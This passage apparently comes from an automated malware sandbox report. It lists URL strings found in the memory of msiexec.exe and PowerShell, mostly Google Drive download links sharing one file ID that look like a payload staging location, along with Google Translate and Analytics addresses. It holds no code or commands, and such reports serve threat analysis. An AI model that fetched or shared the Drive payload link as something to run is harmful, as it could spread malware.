      Source: msiexec.exe, 00000005.00000003.3090137921.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2711803858.0000000004298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/X
      Source: msiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2523018885.0000000004298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/h
      Source: msiexec.exe, 00000005.00000003.2523018885.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2451545013.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2498942674.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2485421154.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2438929250.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2510234046.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2425982165.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2462756182.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2474312583.0000000004298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/hx
      Source: msiexec.exe, 00000005.00000003.2676012695.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3055334878.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2523018885.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2663828352.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2641006198.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2973485192.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2997665236.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2545524165.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2984551535.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3031493892.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3067105082.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3044257570.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3009073152.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3020650857.0000000004297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/p
      Source: msiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2523018885.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3090137921.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2498942674.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2485421154.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2545524165.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2510234046.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2927725562.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2569483717.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2915992411.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3067105082.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3078384418.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2592708971.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3020650857.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2474312583.0000000004298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=do
      Source: msiexec.exe, 00000005.00000003.2474312583.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3316835676.000000000422A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls
      Source: msiexec.exe, 00000005.00000003.2474312583.0000000004298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tlsA
      Source: msiexec.exe, 00000005.00000003.2676012695.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2663828352.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3090137921.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2641006198.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2687705790.000000000429D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2938906527.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2927725562.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2592708971.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2699708927.000000000429F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tlsV1zy1K5eJxu_tls
      Source: msiexec.exe, 00000005.00000003.2498942674.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2510234046.0000000004298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tlsV1zy1K5eJxu_tlsry
      Source: msiexec.exe, 00000005.00000002.3316835676.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tlsXC
      Source: msiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2523018885.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2545524165.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2569483717.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tlsft
      Source: msiexec.exe, 00000005.00000002.3316835676.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tlsl
      Source: msiexec.exe, 00000005.00000002.3316835676.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tlsllJUT%
      Source: msiexec.exe, 00000005.00000003.2523018885.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2412914581.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2451545013.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2498942674.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2485421154.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2438929250.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2510234046.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2425982165.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2462756182.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2401935897.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2474312583.0000000004298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tlsroso
      Source: msiexec.exe, 00000005.00000003.2676012695.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2663828352.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2687705790.000000000429D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2592708971.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2711803858.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2699708927.000000000429F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/x
      Source: msiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2523018885.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2545524165.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2569483717.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2592708971.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/yx
      Source: msiexec.exe, 00000005.00000003.2485421154.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2961631199.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3309084722.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2997665236.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2950409947.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2545524165.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2438929250.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2984551535.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3031493892.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2510234046.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2938906527.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2425982165.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2927725562.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2569483717.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2915992411.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3067105082.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387541623.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2462756182.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3078384418.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3044257570.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2592708971.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: msiexec.exe, 00000005.00000003.3078384418.0000000004298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/TC
      Source: msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
      Source: msiexec.exe, 00000005.00000003.2498942674.0000000004298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download0
      Source: msiexec.exe, 00000005.00000003.2451545013.0000000004297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download9
      Source: msiexec.exe, 00000005.00000003.3055334878.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3090137921.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3316965083.000000000429F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3309084722.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2997665236.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2984551535.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3031493892.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3067105082.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3078384418.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3044257570.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3009073152.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3020650857.0000000004297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download;z
      Source: msiexec.exe, 00000005.00000002.3316965083.000000000429F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3309084722.000000000429E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=downloadJx
      Source: msiexec.exe, 00000005.00000002.3316835676.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=downloadY
      Source: msiexec.exe, 00000005.00000003.3055334878.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2973485192.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2961631199.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2997665236.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2950409947.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2984551535.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3031493892.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2938906527.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2927725562.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2915992411.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3044257570.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3009073152.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3020650857.0000000004297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=downloadZ
      Source: msiexec.exe, 00000005.00000003.2676012695.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2523018885.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2663828352.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2641006198.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2687705790.000000000429D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2545524165.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2510234046.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2711803858.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2699708927.000000000429F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=downloadg
      Source: msiexec.exe, 00000005.00000003.2676012695.000000000429E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=downloadm
      Source: msiexec.exe, 00000005.00000002.3316835676.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=downloads
      Source: msiexec.exe, 00000005.00000003.2676012695.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3055334878.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2523018885.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2412914581.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2663828352.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3090137921.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2641006198.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2687705790.000000000429D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2451545013.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3316965083.000000000429F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2498942674.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2973485192.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2485421154.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2961631199.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3309084722.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2997665236.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2950409947.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2545524165.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2438929250.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2984551535.0000000004297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=downloadt
      Source: msiexec.exe, 00000005.00000003.3009073152.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3020650857.0000000004297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=downloady
      Source: msiexec.exe, 00000005.00000002.3316835676.0000000004288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=downloadz
      Source: powershell.exe, 00000001.00000002.2305178849.0000000005426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000001.00000002.2309066528.0000000006338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 00000005.00000003.3055299635.00000000042DD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3182243382.00000000042DA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2927710979.00000000042DA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2961566167.00000000042DD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3124455076.00000000042DD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3044238660.00000000042DA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2882936221.00000000042DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/t
      Source: msiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/eleme
      Source: msiexec.exe, 00000005.00000003.2687763429.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3316835676.000000000426C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2676012695.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3229050269.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2510162857.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3101012200.00000000042DD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2522992057.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3078384418.00000000042D9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2401935897.0000000004292000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2723378166.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2412914581.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2663828352.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2711696944.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2814564639.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3147623816.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2938842535.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2545476786.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2498862100.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2950369422.00000000042DA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2711766642.00000000042DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: msiexec.exe, 00000005.00000003.2687763429.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3316835676.000000000426C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2676012695.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3229050269.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2510162857.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3101012200.00000000042DD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2522992057.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3078384418.00000000042D9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2401935897.0000000004292000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2723378166.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2412914581.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2663828352.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2711696944.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3044200411.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2814564639.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3147623816.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2938842535.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2545476786.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2498862100.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3055260335.00000000042DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: msiexec.exe, 00000005.00000003.2687763429.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3316835676.000000000426C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2676012695.000000000429E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3229050269.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2510162857.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3101012200.00000000042DD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2522992057.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3078384418.00000000042D9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2401935897.0000000004292000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2534059054.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2723378166.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2412914581.0000000004299000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2663828352.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2711696944.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3044200411.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2814564639.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3147623816.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2938842535.00000000042DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2545476786.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2498862100.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3055260335.00000000042DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
